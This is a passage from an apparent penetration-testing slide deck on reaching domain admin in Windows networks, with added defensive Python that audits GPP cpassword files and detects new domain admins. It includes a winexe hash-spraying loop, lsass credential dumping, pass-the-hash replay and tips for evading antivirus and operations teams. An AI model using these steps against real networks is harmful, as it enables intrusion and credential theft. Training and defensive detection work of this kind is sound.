      • ^ Ops guys now do check logs for shadow volume copies and so I’d recommend using SAMEX. (http://www.josho.org/blog//blog/2013/03/07/samex/)
  • 25. Searching for Domain Admin
    • So you popped a few boxes – got some hashes
    • What now ?
    • If one of those boxes :
      – had a domain admin logged in – you have his password in plain-text or got his hash -> game over.
      – had a service running as domain admin – move to process, pop shell -> game over.
    • Shares the same local administrator password across the network.
      – Spray the hash and look for boxes with processes running as domain admin.
  • 26. Searching for Domain Admin
      #!/bin/sh
      for ip in $(cat ip.txt); do
        ./winexe -U Administrator%passwordhash //$ip "ipconfig"
        ./winexe -U Administrator%passwordhash //$ip "tasklist /v"
      done
    • ^ Metasploit module auxiliary/admin/smb/psexec_command also works. Do not use windows/smb/psexec as this uploads an exe to the box and will trigger AV.
    • Login to the box running the domain admin process – dump the hash or read it from lsass as plain text.
    • Replay the hash or login as domain admin over RDP etc.
    • Game over.
    – Pro Stealth tip : Once you get a domain admin shell DO NOT CREATE a new domain admin user.
      • This will trigger Ops as a lot of organisations are alerted if a new domain administrator is created.
  • 27. Looting
    • Go after SQL servers – you should have a list of these from your scans
    • Shares – Yes, people still store heaps of confidential stuff unencrypted in shares
    • Have you guys seen Firefox PTH ? – All ur OWA and sharepoint r belong 2 us !
    • Metasploit – post exploitation modules – store loot in the MSF DB for grepping later.
  • 28. Firefox PTH
    • DEMO
    • https://code.google.com/p/passing-the-hash/downloads/list
  • 29. Mitigations
    • You can’t really stop a determined attacker
    • There are just way too many ways you could get hacked
    • Best bet is to detect
    • Check anomalies – New user creation (DA etc), Local admin logons, AV pickups etc
    • User education
    • Google’s new n/w architecture – All zones are untrusted (Not a bad idea eh ?)
    • Obvious old school protections should still apply – Patching, strong passwords, access controls etc
  • 30. Testing “Pro” tips
    • Don’t leave any accounts you create on the customer’s network – delete everything (Finding a DA account left by the pen-tester from the last engagement = fail)
    • Bruteforce wisely – locking out an important service will not go down well with a customer (Bump down threads = increase stealth)
    • Don’t disable AV – Intelligent Ops are alerted if AV dies
    • Wipe your VM after every pen-test – A clean slate to work on is so much better
    • Snapshotting to have all your tools set up and then reset also works
    • Script for linux is your best friend
    • Notes – always good for other eyes trying to read and understand what you did (doesn’t even have to be fancy – Vi or notepad works)
    • Videos for complex attacks – I’d highly recommend it (mind you, this is gonna eat some disk space and sending this to a client might be difficult)
  • 31. Music (Ignore slide if you don’t listen to music)
    • Meshuggah, Lamb of God and Tool – when ur feeling effing awesome and pwning like a baws
    • Trying really hard for a breakthrough or fighting a problem – Really fast techno or dubstep
    • When you lose it and wanna break your laptop – Vitamin String Quartet (trust me this works)
  • 32. That’s it
    • Things I want to work on (any help will earn beers and respect):
      – Write more ducky scripts (hopefully run faster and grab more stuff, reverse shell etc)
      – Write post exploit modules (which can loot more efficiently)
      – Setup a Pi that can do all this over 3/4g to be sent to the client so I can watch BSG and sip beer.
    – Hope this helped. Google for anything that I may not have provided a link for or explained in detail
    Blog: http://psychsec.wordpress.com/
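Slide 8 points at GPP cpassword as the usual source of a network-wide local administrator password. The defensive counterpart is to find every preference item in SYSVOL that still carries the attribute; this is an added example, not code from the deck, and the Groups.xml below is constructed (the cpassword value is a placeholder, not a real blob).

```python
"""Audit Group Policy Preference XML for the cpassword attribute slide 8 talks
about.  Added example, not from the deck: it reports where the attribute is
present (those items should be deleted from SYSVOL and the passwords rotated)
and decrypts nothing.  The sample file below is constructed."""
import pathlib
import xml.etree.ElementTree as ET

# Preference files that can carry cpassword, and the attribute each uses for
# the account name (Groups/Drives/DataSources/Printers: userName,
# Services: accountName, ScheduledTasks: runAs).
GPP_FILES = {"Groups.xml", "Services.xml", "ScheduledTasks.xml",
             "DataSources.xml", "Drives.xml", "Printers.xml"}
ACCOUNT_ATTRS = ("userName", "accountName", "runAs")

# Constructed Groups.xml: one item sets the built-in Administrator password
# (cpassword value is a placeholder, not a real blob), one item carries none.
SAMPLE_GROUPS_XML = """<Groups>
  <User name="Administrator (built-in)" changed="2013-05-01 10:00:00">
    <Properties action="U" userName="Administrator (built-in)"
        cpassword="PLACEHOLDER_BASE64_CPASSWORD" neverExpires="1"/>
  </User>
  <User name="helpdesk" changed="2013-05-02 09:00:00">
    <Properties action="U" userName="helpdesk" acctDisabled="0"/>
  </User>
</Groups>
"""


def find_cpassword(xml_text, source="Groups.xml"):
    """Return (source, item tag, item name, account) for every preference
    item whose <Properties> carries a non-empty cpassword attribute."""
    findings = []
    for item in ET.fromstring(xml_text):
        props = item.find("Properties")
        if props is None or not props.get("cpassword"):
            continue
        account = next((props.get(a) for a in ACCOUNT_ATTRS if props.get(a)), "?")
        findings.append((source, item.tag, item.get("name", ""), account))
    return findings


def audit_sysvol(root_dir):
    """Walk a SYSVOL Policies tree (or an offline copy of it) and collect
    findings from every preference file that may hold a cpassword."""
    findings = []
    for path in pathlib.Path(root_dir).rglob("*.xml"):
        if path.name in GPP_FILES:
            text = path.read_text(encoding="utf-8-sig")  # tolerates the usual BOM
            findings += find_cpassword(text, str(path))
    return findings
```

Point audit_sysvol at \\<domain>\SYSVOL\<domain>\Policies (or a copy of it); an empty result is the state you want, since any hit is a password readable by every domain user.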
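Slide 26's stealth tip and slide 29's "check anomalies" bullet describe the same detections from the two sides: a freshly created Domain Admin and interactive logons by the built-in local Administrator. As an added example that is not part of the deck, here is that logic run over a constructed batch of Windows Security events (4720, 4728 and 4624 are the real event IDs; the hosts, accounts and the domain name CORP are made up).

```python
"""Detect two of the anomalies slide 29 lists: a new account landing in a
privileged group (the 'create a new DA' move slide 26 says Ops alert on) and
interactive logons by the built-in local Administrator (the trail a shared,
sprayed local-admin password leaves).  Added example; events are constructed."""

PRIVILEGED_GROUPS = {"Domain Admins", "Enterprise Admins", "Schema Admins"}
INTERACTIVE_LOGON_TYPES = {2, 10}  # 2 = console, 10 = RemoteInteractive (RDP)

# Constructed batch shaped after Security event IDs 4720 (user account
# created), 4728 (member added to a security-enabled global group) and
# 4624 (successful logon).  "CORP" is the assumed domain NetBIOS name.
SAMPLE_EVENTS = [
    {"id": 4720, "subject": "CORP\\svc_backup", "target": "CORP\\helpdesk2"},
    {"id": 4728, "subject": "CORP\\svc_backup", "member": "CORP\\helpdesk2",
     "group": "Domain Admins"},
    {"id": 4728, "subject": "CORP\\jdoe", "member": "CORP\\alice", "group": "Marketing"},
    {"id": 4624, "account": "WS01\\Administrator", "logon_type": 10, "host": "WS01"},
    {"id": 4624, "account": "WS02\\Administrator", "logon_type": 3, "host": "WS02"},
    {"id": 4624, "account": "CORP\\bob", "logon_type": 10, "host": "WS03"},
    {"id": 4624, "account": "WS04\\Administrator", "logon_type": 10, "host": "WS04"},
]


def privileged_group_additions(events):
    """(member, group, who did it) for every 4728 into a privileged group."""
    return [(e["member"], e["group"], e["subject"]) for e in events
            if e["id"] == 4728 and e["group"] in PRIVILEGED_GROUPS]


def fresh_privileged_accounts(events):
    """Accounts created (4720) and then added to a privileged group (4728)
    within the same batch: the 'just create a new DA' pattern."""
    created = {e["target"] for e in events if e["id"] == 4720}
    return [m for m, _group, _by in privileged_group_additions(events)
            if m in created]


def local_admin_interactive_logons(events, domain="CORP"):
    """(host, account) for 4624 console/RDP logons by HOST\\Administrator,
    i.e. the local built-in account rather than DOMAIN\\Administrator.
    Network logons (type 3) are left out: too noisy from normal admin tooling."""
    hits = []
    for e in events:
        if e["id"] != 4624 or e["logon_type"] not in INTERACTIVE_LOGON_TYPES:
            continue
        scope, _, user = e["account"].partition("\\")
        if user.lower() == "administrator" and scope.upper() != domain.upper():
            hits.append((e["host"], e["account"]))
    return hits
```

The same built-in account appearing interactively on several hosts in a short window is what the hash-spraying loop on slide 26 looks like from the log side.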

Editor's Notes

  1. Windows =< 5.2 Domain members (XP, Windows server 2003 and above) have ICMP Redirect enabled by default. This functionality can be used to remotely add (with no authentication required) a new route for a given host. So basically, anything older than Windows Vista / Server 2008 is vulnerable. You just send it an ICMP redirect, and shiz gets redirected.